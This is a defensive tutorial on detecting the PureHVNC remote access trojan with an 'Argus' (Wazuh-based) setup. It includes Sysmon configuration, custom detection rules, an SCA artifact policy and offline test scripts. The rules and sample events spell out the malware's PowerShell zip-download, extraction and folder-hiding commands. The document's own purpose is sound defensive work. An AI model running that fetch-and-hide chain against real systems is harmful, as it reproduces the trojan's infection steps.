Detecting PureHVNC malware with Argus

PureHVNC is a covert Remote Access Trojan (RAT) that lets attackers control Windows endpoints without the user noticing. The HVNC in PureHVNC stands for “Hidden Virtual Network Computing”. Typically delivered through phishing emails with malicious attachments, it activates upon execution. The malware downloads and opens a decoy PDF, retrieves two ZIP files (DXJS.zip and FTSP.zip) via PowerShell, and extracts their contents into hidden folders within the user’s Downloads directory. It then runs multiple Python scripts (such as money.py, update.py, and others) from the extracted files and reopens the decoy PDF to sustain the ruse. Additionally, PureHVNC establishes communication with a command-and-control (C2) server, enabling attackers to execute remote commands on the infected system.

ANALYZED IOC

  Type  Value
  Hash (SHA256)  441c4502584240624f4af6d67eded476c781ff0b72afe95ea236cc87a50e5650
  MD5  372d3835bc694a7d9934727030bf7be6

REQUIREMENTS

  • Argus server or Argus manager
  • A Windows victim endpoint with the Argus agent installed

DETECTION WITH ARGUS

Argus provides the following capabilities to detect PureHVNC malware on an infected Windows endpoint:

  • Custom detection rules that flag PureHVNC malware activities.
  • The Argus Security Configuration Assessment (SCA) module, which checks for the presence of PureHVNC malware artifacts.

DETECTION CRITERIA

  • Use Sysmon to monitor several system events on the Windows endpoint.
  • Create rules on the Argus server to detect the malicious activities of PureHVNC malware.

Windows endpoint

Steps to configure Sysmon on the endpoint and forward the logs in the Sysmon event channel to the Argus server for analysis:

  1. Download Sysmon from https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
  2. Extract the compressed Sysmon file to a location of your choice
  3. Using PowerShell, download the Sysmon configuration file sysmonconfig.xml. Replace <SYSMON_EXECUTABLE_PATH> with the path to your Sysmon executable:

wget -Uri https://wazuh.com/resources/blog/emulation-of-attack-techniques-and-detection-with-wazuh/sysmonconfig.xml -OutFile <SYSMON_EXECUTABLE_PATH>\sysmonconfig.xml

  4. Switch to the directory containing the Sysmon executable. Run the command below in a PowerShell session with Administrator privileges to install and start Sysmon:

.\Sysmon64.exe -accepteula -i sysmonconfig.xml

  5. Add the following configuration within the <ossec_config> block of the C:\Program Files (x86)\ossec-agent\ossec.conf file to forward Sysmon events to the Argus server:

<localfile>
    <location>Microsoft-Windows-Sysmon/Operational</location>
    <log_format>eventchannel</log_format>
</localfile>

  6. Restart the Argus agent:

Restart-Service -Name wazuh

Argus server

Create rules to detect PureHVNC malware behavior on the endpoint:

  1. Create the file purehvnc_malware.xml in the /var/ossec/etc/rules/ directory:

$ nano /var/ossec/etc/rules/purehvnc_malware.xml

  2. Add the following rules to the /var/ossec/etc/rules/purehvnc_malware.xml file:

<group name="purehvnc,malware,">
  <rule id="100201" level="12">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.Image" type="pcre2">(?i)timeout\.exe</field>
    <field name="win.eventdata.CommandLine" type="pcre2">\/t 5</field>
    <field name="win.eventdata.CommandLine" type="pcre2">REM\sWait\sfor\sPDF\sto\sopen</field>
    <description>Possible PureHVNC malware activity: PDF delayed execution with timeout.exe.</description>
    <mitre>
      <id>T1059</id>
    </mitre>
  </rule>

  <rule id="100202" level="12">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.Image" type="pcre2">(?i)powershell\.exe</field>
    <field name="win.eventdata.CommandLine" type="pcre2">Net.ServicePointManager</field>
    <field name="win.eventdata.CommandLine" type="pcre2">Net.SecurityProtocolType</field>
    <field name="win.eventdata.CommandLine" type="pcre2">Invoke-WebRequest\s-Uri</field>
    <field name="win.eventdata.CommandLine" type="pcre2">DXJS.zip</field>
    <description>Possible PureHVNC malware activity: Suspicious ZIP file DXJS.zip downloaded from a remote file share.</description>
    <mitre>
      <id>T1105</id>
    </mitre>
  </rule>

  <rule id="100203" level="15">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.Image" type="pcre2">(?i)powershell\.exe</field>
    <field name="win.eventdata.CommandLine" type="pcre2">Expand-Archive</field>
    <field name="win.eventdata.CommandLine" type="pcre2">\-DestinationPath</field>
    <field name="win.eventdata.CommandLine" type="pcre2">DXJS.zip</field>
    <field name="win.eventdata.CommandLine" type="pcre2">\-Force</field>
    <description>Possible PureHVNC malware activity: Suspicious ZIP file DXJS.zip extracted.</description>
    <mitre>
      <id>T1059.001</id>
    </mitre>
  </rule>

  <rule id="100204" level="15">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.Image" type="pcre2">(?i)attrib\.exe</field>
    <field name="win.eventdata.CommandLine" type="pcre2">\+h</field>
    <description>Possible PureHVNC malware activity: Suspicious folder hiding activity.</description>
    <mitre>
      <id>T1564.001</id>
    </mitre>
  </rule>

  <rule id="100205" level="15">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.Image" type="pcre2">(?i)AppInstallerPythonRedirector\.exe</field>
    <field name="win.eventdata.CommandLine" type="pcre2">python\.exe</field>
    <field name="win.eventdata.CommandLine" type="pcre2">(?i)(money|update|upload|time|kam|moment|info)\.py</field>
    <description>Possible PureHVNC malware activity: Suspicious Python script executed.</description>
    <mitre>
      <id>T1059.006</id>
    </mitre>
  </rule>

  <rule id="100206" level="12">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.Image" type="pcre2">(?i)powershell\.exe</field>
    <field name="win.eventdata.CommandLine" type="pcre2">Net.ServicePointManager</field>
    <field name="win.eventdata.CommandLine" type="pcre2">Net.SecurityProtocolType</field>
    <field name="win.eventdata.CommandLine" type="pcre2">Invoke-WebRequest\s-Uri</field>
    <field name="win.eventdata.CommandLine" type="pcre2">FTSP.zip</field>
    <description>Possible PureHVNC malware activity: Suspicious ZIP file FTSP.zip downloaded from a remote file share.</description>
    <mitre>
      <id>T1105</id>
    </mitre>
  </rule>

  <rule id="100207" level="15">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.Image" type="pcre2">(?i)powershell\.exe</field>
    <field name="win.eventdata.CommandLine" type="pcre2">Expand-Archive</field>
    <field name="win.eventdata.CommandLine" type="pcre2">\-DestinationPath</field>
    <field name="win.eventdata.CommandLine" type="pcre2">FTSP.zip</field>
    <field name="win.eventdata.CommandLine" type="pcre2">\-Force</field>
    <description>Possible PureHVNC malware activity: Suspicious ZIP file FTSP.zip extracted.</description>
    <mitre>
      <id>T1059.001</id>
    </mitre>
  </rule>
</group>

  3. Restart the Argus manager:

systemctl restart wazuh-manager
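Before deploying the rules above, it helps to see exactly what they will and will not alert on. The script below is an added example, not Argus/Wazuh code: it re-implements in plain Python only the matching semantics the rules depend on (every <field> in a rule must match, patterns are searched within the field rather than anchored, and the <if_sid> chain to 61603 restricts the rules to Sysmon process-creation events, Event ID 1). Python's re module stands in for PCRE2; the seven patterns are valid in both. The Sysmon events are constructed samples with placeholder paths and an invalid hostname, not captured telemetry, and the decoded field names follow the Wazuh Sysmon decoder (win.system.eventID, win.eventdata.Image, win.eventdata.CommandLine).

```python
"""Offline check of the seven PureHVNC process-creation rules against
constructed Sysmon events (added example, not Argus/Wazuh code)."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    rule_id: int
    level: int
    image: str       # pattern for win.eventdata.Image
    cmdline: tuple   # patterns for win.eventdata.CommandLine; all must match


# Patterns copied from purehvnc_malware.xml, one Rule per <rule>.
RULES = (
    Rule(100201, 12, r"(?i)timeout\.exe",
         (r"\/t 5", r"REM\sWait\sfor\sPDF\sto\sopen")),
    Rule(100202, 12, r"(?i)powershell\.exe",
         (r"Net.ServicePointManager", r"Net.SecurityProtocolType",
          r"Invoke-WebRequest\s-Uri", r"DXJS.zip")),
    Rule(100203, 15, r"(?i)powershell\.exe",
         (r"Expand-Archive", r"\-DestinationPath", r"DXJS.zip", r"\-Force")),
    Rule(100204, 15, r"(?i)attrib\.exe", (r"\+h",)),
    Rule(100205, 15, r"(?i)AppInstallerPythonRedirector\.exe",
         (r"python\.exe", r"(?i)(money|update|upload|time|kam|moment|info)\.py")),
    Rule(100206, 12, r"(?i)powershell\.exe",
         (r"Net.ServicePointManager", r"Net.SecurityProtocolType",
          r"Invoke-WebRequest\s-Uri", r"FTSP.zip")),
    Rule(100207, 15, r"(?i)powershell\.exe",
         (r"Expand-Archive", r"\-DestinationPath", r"FTSP.zip", r"\-Force")),
)


def match_event(event, rules=RULES):
    """Return the ids of every rule whose fields all match the decoded event.

    Only Event ID 1 (process creation) reaches these rules, because each one
    chains to 61603 through <if_sid>; other event ids are dropped up front.
    """
    if event.get("win.system.eventID") != "1":
        return []
    image = event.get("win.eventdata.Image", "")
    cmdline = event.get("win.eventdata.CommandLine", "")
    return [
        r.rule_id for r in rules
        if re.search(r.image, image)
        and all(re.search(p, cmdline) for p in r.cmdline)
    ]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SYS32 = r"C:\Windows\System32"


def make_event(image, cmdline, event_id="1"):
    """Build a minimal decoded Sysmon event (constructed, not captured)."""
    return {"win.system.eventID": event_id,
            "win.eventdata.Image": image,
            "win.eventdata.CommandLine": cmdline}


# Constructed events: four that mirror the behaviour the rules describe and
# three near misses that share a binary with a rule but not its full command line.
SAMPLE_EVENTS = {
    "dxjs_download": make_event(PS, "powershell.exe -Command \"[Net.ServicePointManager]::SecurityProtocol = "
                                    "[Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri "
                                    "https://files.example.invalid/DXJS.zip -OutFile DXJS.zip\""),
    "ftsp_extract": make_event(PS, "powershell.exe -Command \"Expand-Archive -Path FTSP.zip "
                                   "-DestinationPath .\\Python -Force\""),
    "hide_folder": make_event(SYS32 + r"\attrib.exe", "attrib +h +s Python"),
    "python_script": make_event(r"C:\Users\victim\AppData\Local\Microsoft\WindowsApps\AppInstallerPythonRedirector.exe",
                                r"python.exe Python\Python312\money.py"),
    "timeout_no_comment": make_event(SYS32 + r"\timeout.exe", "timeout /t 5"),
    "attrib_readonly": make_event(SYS32 + r"\attrib.exe", "attrib +r notes.txt"),
    "network_event": make_event(PS, "Invoke-WebRequest -Uri https://files.example.invalid/DXJS.zip", event_id="3"),
}


def run_samples(events=SAMPLE_EVENTS):
    """Map each sample label to the list of rule ids it fires."""
    return {label: match_event(evt) for label, evt in events.items()}


if __name__ == "__main__":
    for label, hits in run_samples().items():
        print(f"{label:20s} -> {hits or 'no alert'}")
```

The near misses are the useful part: a bare `timeout /t 5` or an `attrib +r` never fires, because every <field> in a rule has to match, and the same command line arriving as a Sysmon network event (Event ID 3) is ignored because the rules only descend from 61603. When tuning these rules for your environment, add your own benign command lines to SAMPLE_EVENTS and confirm they stay silent before restarting the manager.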

Detection results

  1. Navigate to Threat Hunting > Events
  2. Click Add filter
  3. Select rule.id in the Field dropdown
  4. Select is one of in the Operator dropdown and enter 100201,100202,100203,100204,100205,100206,100207 in the Values field
  5. Click Save

Security configuration assessment (SCA)

The Argus SCA module assesses system configurations by comparing them to a predefined set of rules and benchmarks. It conducts checks to verify system hardening, identify vulnerable software, and ensure configuration policies are properly applied on monitored endpoints. By leveraging the SCA module, organizations can strengthen their security posture, maintain compliance with industry standards, and minimize the risk of security breaches.

Windows endpoint

We configure the Argus SCA module to check for the presence of PureHVNC malware artifacts on the Windows endpoint.

  1. Launch PowerShell with administrative privilege and create a folder to store custom SCA policy files:

> New-Item -Path "C:\Program Files (x86)\" -Name "sca_policies" -ItemType Directory

  2. Create the file purehvnc_malware_check.yml in the C:\Program Files (x86)\sca_policies folder:

> New-Item -Path 'C:\Program Files (x86)\sca_policies\purehvnc_malware_check.yml' -ItemType File

  3. Add the following content to the C:\Program Files (x86)\sca_policies\purehvnc_malware_check.yml file. Replace <USERNAME> with the name of the user profile whose Downloads folder is to be checked:

# Security Configuration Assessment
# Audit for PureHVNC malware
# Copyright (C) 2024, Wazuh Inc.
#
# This program is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public
# License (version 2) as published by the FSF - Free Software
# Foundation

policy:
  id: "PureHVNC_malware"
  file: "purehvnc_malware_check.yml"
  name: "PureHVNC malware Windows OS check"
  description: "Detecting PureHVNC malware"

requirements:
  title: "Checking PureHVNC malware on Windows based systems"
  description: "Requirements for running the audit policy under a Windows platform"
  condition: all
  rules:
    - 'r:HKEY_LOCAL_MACHINE\SAM\SAM'

checks:
  - id: 77000
    title: "Checking for Possible PureHVNC malware artifacts (ZIP files) in Downloads folder"
    description: "Check for ZIP files associated with PureHVNC malware in Downloads folder."
    remediation: "Delete the files DXJS.zip and FTSP.zip from the Downloads folder."
    condition: all
    rules:
      - 'not f:C:\Users\<USERNAME>\Downloads\DXJS.zip'
      - 'not f:C:\Users\<USERNAME>\Downloads\FTSP.zip'

  - id: 77001
    title: "Checking for Possible PureHVNC malware artifacts (Python scripts) in Downloads folder"
    description: "Check for Python scripts associated with PureHVNC malware in Downloads folder."
    remediation: "Delete the Python scripts and the Python folder from the Downloads folder."
    condition: all
    rules:
      - 'not f:C:\Users\<USERNAME>\Downloads\Python\Python312\money.py'
      - 'not f:C:\Users\<USERNAME>\Downloads\Python\Python312\update.py'
      - 'not f:C:\Users\<USERNAME>\Downloads\Python\Python312\upload.py'
      - 'not f:C:\Users\<USERNAME>\Downloads\Python\Python312\time.py'
      - 'not f:C:\Users\<USERNAME>\Downloads\Python\Python312\kam.py'
      - 'not f:C:\Users\<USERNAME>\Downloads\Python\Python312\moment.py'
      - 'not f:C:\Users\<USERNAME>\Downloads\Python\Python312\info.py'

  - id: 77002
    title: "Checking for Possible PureHVNC malware artifacts (batch file) in Downloads folder"
    description: "Check for batch file associated with PureHVNC malware in Downloads folder."
    remediation: "Delete the startuppp.bat file from the Downloads folder."
    condition: all
    rules:
      - 'not f:C:\Users\<USERNAME>\Downloads\startuppp.bat'

  - id: 77003
    title: "Checking for Possible PureHVNC malware artifacts (folders) in Downloads folder"
    description: "Check for folders associated with PureHVNC malware in Downloads folder."
    remediation: "Delete the Python and Print folders from the Downloads folder."
    condition: all
    rules:
      - 'not d:C:\Users\<USERNAME>\Downloads\Python'
      - 'not d:C:\Users\<USERNAME>\Downloads\Print'

  4. Edit the Argus agent C:\Program Files (x86)\ossec-agent\ossec.conf file and include the following configuration within the <sca> block:

<policies>
  <policy>C:\Program Files (x86)\sca_policies\purehvnc_malware_check.yml</policy>
</policies>

  5. Restart the Argus agent:

> Restart-Service -Name WazuhSvc

Monitoring the Alerts

Navigate to the Configuration Assessment page on the Argus dashboard. Select the monitored Windows endpoint, then select PureHVNC malware Windows OS check to view the scan results.

A Failed result indicates that the PureHVNC malware artifacts were detected on the endpoint. Conversely, a Passed result indicates that the PureHVNC malware artifacts were not detected and that the endpoint meets the SCA policy criteria.
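The pass/fail logic of the policy above is easy to verify without an agent. The script below is an added example, not Argus/Wazuh code: it re-implements only the subset of SCA rule syntax the policy uses (f: file exists, d: directory exists, a leading not, and condition: all, under which a check passes only if every rule holds) and evaluates the four checks against a throwaway directory tree. The <USERNAME> placeholder is mapped onto a constructed profile root inside a temporary directory, and the artifact files it creates are empty placeholders, not malware samples.

```python
"""Offline evaluation of the PureHVNC SCA checks against a temporary
profile tree (added example, not Argus/Wazuh code)."""
import os
import tempfile

# The four checks from purehvnc_malware_check.yml, reduced to id -> rules.
PROFILE_PREFIX = r"C:\Users\<USERNAME>"
CHECKS = {
    77000: [PROFILE_PREFIX + r"\Downloads\DXJS.zip",
            PROFILE_PREFIX + r"\Downloads\FTSP.zip"],
    77001: [PROFILE_PREFIX + r"\Downloads\Python\Python312\%s.py" % s
            for s in ("money", "update", "upload", "time", "kam", "moment", "info")],
    77002: [PROFILE_PREFIX + r"\Downloads\startuppp.bat"],
    77003: [PROFILE_PREFIX + r"\Downloads\Python",
            PROFILE_PREFIX + r"\Downloads\Print"],
}
# Every rule in the policy is "not f:" except check 77003, which uses "not d:".
CHECKS = {cid: ["not %s:%s" % ("d" if cid == 77003 else "f", p) for p in paths]
          for cid, paths in CHECKS.items()}


def resolve(rule_path, profile_root):
    """Map 'C:\\Users\\<USERNAME>\\...' onto a local directory under profile_root."""
    if not rule_path.startswith(PROFILE_PREFIX):
        raise ValueError("rule path is not under the user profile: %r" % rule_path)
    rest = rule_path[len(PROFILE_PREFIX):].lstrip("\\").split("\\")
    return os.path.join(profile_root, *rest)


def eval_rule(rule, profile_root):
    """Return True when one SCA rule holds (f: file exists, d: dir exists, optional not)."""
    negate = rule.startswith("not ")
    body = rule[4:] if negate else rule
    kind, _, path = body.partition(":")
    full = resolve(path, profile_root)
    if kind == "f":
        present = os.path.isfile(full)
    elif kind == "d":
        present = os.path.isdir(full)
    else:
        raise ValueError("unsupported rule type %r" % kind)
    return (not present) if negate else present


def eval_checks(profile_root, checks=CHECKS):
    """condition: all -> a check passes only if every one of its rules holds."""
    return {cid: "passed" if all(eval_rule(r, profile_root) for r in rules) else "failed"
            for cid, rules in checks.items()}


def demo(artifacts=("Downloads/DXJS.zip", "Downloads/Python/Python312/money.py")):
    """Create the given relative paths as empty placeholder files in a temporary
    profile root (constructed for the demo) and evaluate the checks against it."""
    with tempfile.TemporaryDirectory() as root:
        for rel in artifacts:
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            open(full, "wb").close()
        return eval_checks(root)


if __name__ == "__main__":
    for cid, result in demo().items():
        print(cid, result)
```

With the default two placeholder artifacts, checks 77000, 77001 and 77003 report failed and 77002 reports passed, which is the same Failed/Passed split the dashboard shows: 77003 fails even though only money.py was created, because creating it also creates the Downloads\Python folder that the check forbids. An empty profile passes all four.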

Conclusion

This use case demonstrates how to detect PureHVNC malware and its malicious activities with Argus custom detection rules and the Argus SCA module.
